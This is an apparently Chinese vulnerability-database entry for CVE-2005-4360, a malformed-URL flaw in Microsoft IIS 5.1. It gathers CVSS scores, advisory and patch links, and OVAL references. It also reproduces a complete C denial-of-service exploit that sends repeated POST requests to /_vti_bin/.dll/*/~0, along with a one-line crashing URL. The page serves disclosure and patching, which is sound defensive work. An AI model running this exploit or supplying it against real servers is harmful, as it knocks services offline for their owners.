CVE-2005-4360
CVSS7.8
发布时间 :2005-12-19 20:03:00
修订时间 :2011-10-03 00:00:00
NMCOES    

[原文]The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll/*/~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot).


[CNNVD]Microsoft IIS 5.1远程缓冲区溢出漏洞(CNNVD-200512-423)

        Microsoft IIS是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。
        Microsoft IIS处理某些畸形的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
        远程攻击者可以使用WEB浏览器之类的工具发送特制的匿名HTTP请求导致IIS服务进程inetinfo.exe崩溃。仅在文件夹的"执行权限"设置为"脚本和可执行程序"时才会出现这个漏洞。有漏洞的虚拟文件夹包括"/_vti_bin"等。此外如果提交恶意请求还可能会触发缓冲区溢出,导致在用户系统上执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1703IIS Memory Request Vulnerability
oval:gov.nist.fdcc.patch:def:450MS07-041: Vulnerability in Microsoft Internet Information Services Could Allow Remote Code Execution (939373)
oval:gov.nist.USGCB.patch:def:450MS07-041: Vulnerability in Microsoft Internet Information Services Could Allow Remote Code Execution (939373)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4360
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4360
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-423
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA07-191A.html
(UNKNOWN)  CERT  TA07-191A
http://www.vupen.com/english/advisories/2005/2963
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2963
http://www.securityfocus.com/bid/15921
(UNKNOWN)  BID  15921
http://www.securityfocus.com/archive/1/archive/1/419707/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051216 Microsoft IIS Remote Denial of Service (DoS) .DLL Url exploit
http://www.osvdb.org/21805
(UNKNOWN)  OSVDB  21805
http://www.microsoft.com/technet/security/Bulletin/ms07-041.mspx
(UNKNOWN)  MS  MS07-041
http://securitytracker.com/alerts/2005/Dec/1015376.html
(UNKNOWN)  SECTRACK  1015376
http://securityreason.com/securityalert/271
(UNKNOWN)  SREASON  271
http://secunia.com/advisories/18106
(VENDOR_ADVISORY)  SECUNIA  18106
http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
(VENDOR_ADVISORY)  MISC  http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
http://archive.cert.uni-stuttgart.de/bugtraq/2007/07/msg00254.html
(UNKNOWN)  HP  SSRT071446

- 漏洞信息

Microsoft IIS 5.1远程缓冲区溢出漏洞
高危 输入验证
2005-12-19 00:00:00 2005-12-21 00:00:00
远程  
        Microsoft IIS是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。
        Microsoft IIS处理某些畸形的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
        远程攻击者可以使用WEB浏览器之类的工具发送特制的匿名HTTP请求导致IIS服务进程inetinfo.exe崩溃。仅在文件夹的"执行权限"设置为"脚本和可执行程序"时才会出现这个漏洞。有漏洞的虚拟文件夹包括"/_vti_bin"等。此外如果提交恶意请求还可能会触发缓冲区溢出,导致在用户系统上执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.microsoft.com/technet/security/Bulletin/ms07-041.mspx?pf=true
        http://www.microsoft.com/downloads/details.aspx?FamilyId=fccbfe90-f838-47df-8310-352e2fb47132" target="_blank

- 漏洞信息 (1376)

MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c) (EDBID:1376)
windows dos
2005-12-19 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan

Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/

Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA,  Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com


Vulnerable:
Microsoft® Internet Information Server® V5.1

Not vulnerable:
Microsoft® Internet Information Server® V5.0
Microsoft® Internet Information Server® V6.0


Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.

inetinfo.exe will be crashed after exploitation finished successfuly.

Usage: iis51dos.exe [Target Url or IP]

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")


char *HttpHeader(char *pszHost)
{
       char szHeader[1000];

       wsprintf(       szHeader,       "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
                                                       "Content-Type: application/x-www-form-urlencoded\r\n"
                                                       "Host: %s\r\n"
                                                       "Content-Length: 0\r\n\r\n"
                                               ,       pszHost
                       );

       return szHeader;
}


int main(int argc, char *argv[])
{
       fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
                                       "Bug Discovered by: Inge Henriksen\n"
                                       "Exploit Coded by: Kozan\n"
                                       "Credits to ATmaCA, Inge Henriksen\n"
                                       "www.spyinstructors.com - kozan@spyinstructors.com\n\n"
                       );

       if( argc != 2 )
       {
               fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
               return -1;
       }

       WSADATA wsaData;
       struct hostent *pTarget;
       struct sockaddr_in addr;
       SOCKET sock;

       char szHeader[1000], szWebUrl[1000];

       lstrcpy(szWebUrl, argv[1]);
       lstrcpy(szHeader, HttpHeader(szWebUrl));

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);

       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       if( (pTarget = gethostbyname(szWebUrl)) == NULL )
       {
               fprintf(stderr, "Address resolve error!\n");
               return -1;
       }

       memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       addr.sin_family = AF_INET;
       addr.sin_port = htons(80);
       memset(&(addr.sin_zero), '\0', 8);

       fprintf(stdout, "Please wait while connecting...\n");

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Connected.\n\n");

       fprintf(stdout, "Please wait while sending DoS request headers...\n\n");

       for( int i=0; i<4; i++ )
       {
               fprintf(stdout, "Sending %d. request...\n", i+1);

               if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
               {
                       fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
                       closesocket(sock);
                       return -1;
               }

               fprintf(stdout, "%d. request sent.\n\n", i+1);
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();


       return 0;
}

// milw0rm.com [2005-12-19]
		

- 漏洞信息

21805
Microsoft IIS Crafted URL Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Microsoft Internet Information Services (IIS) contains a flaw that may allow a remote denial of service. The issue is triggered when a crafted URL pointing to a folder with execute permission set to Scripts and Executables is sent, and will result in loss of availability for the service.

- 时间线

2005-12-16 Unknow
2005-12-16 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Internet Information Server 5.1 DLL Request Remote Code Execution Vulnerability
Boundary Condition Error 15921
Yes No
2005-12-17 12:00:00 2007-07-13 03:27:00
Discovered by Inge Henriksen <nge.henriksen@booleansoft.com>. Jonathan Afek and Adi Sharabani of Watchfire supplied more information and assisted Microsoft with this issue.

- 受影响的程序版本

Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Avaya Messaging Application Server MM 3.1
Avaya Messaging Application Server MM 3.0
Avaya Messaging Application Server MM 2.0

- 漏洞讨论

Microsoft IIS is prone to a remote code-execution vulnerability because the application fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the vulnerable application, which may lead to the complete compromise of affected computers.

This issue affects Microsoft IIS 5.1 running on Windows XP SP2.

Note: this issue was previously reported as a denial-of-service vulnerability. New information from the vendor states that code execution is possible.

- 漏洞利用

To demonstrate this issue, the following request will crash the application if issued a number of times (four requests will do the trick, according to the author):

http://www.example.xom/_vti_bin/.dll/*\~0

The following proof-of-concept exploit also demonstrates this issue by crashing the application:

- 解决方案

The vendor released an advisory along with fixes to address this issue. Please see the referenced advisory for more information.


Microsoft IIS 5.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站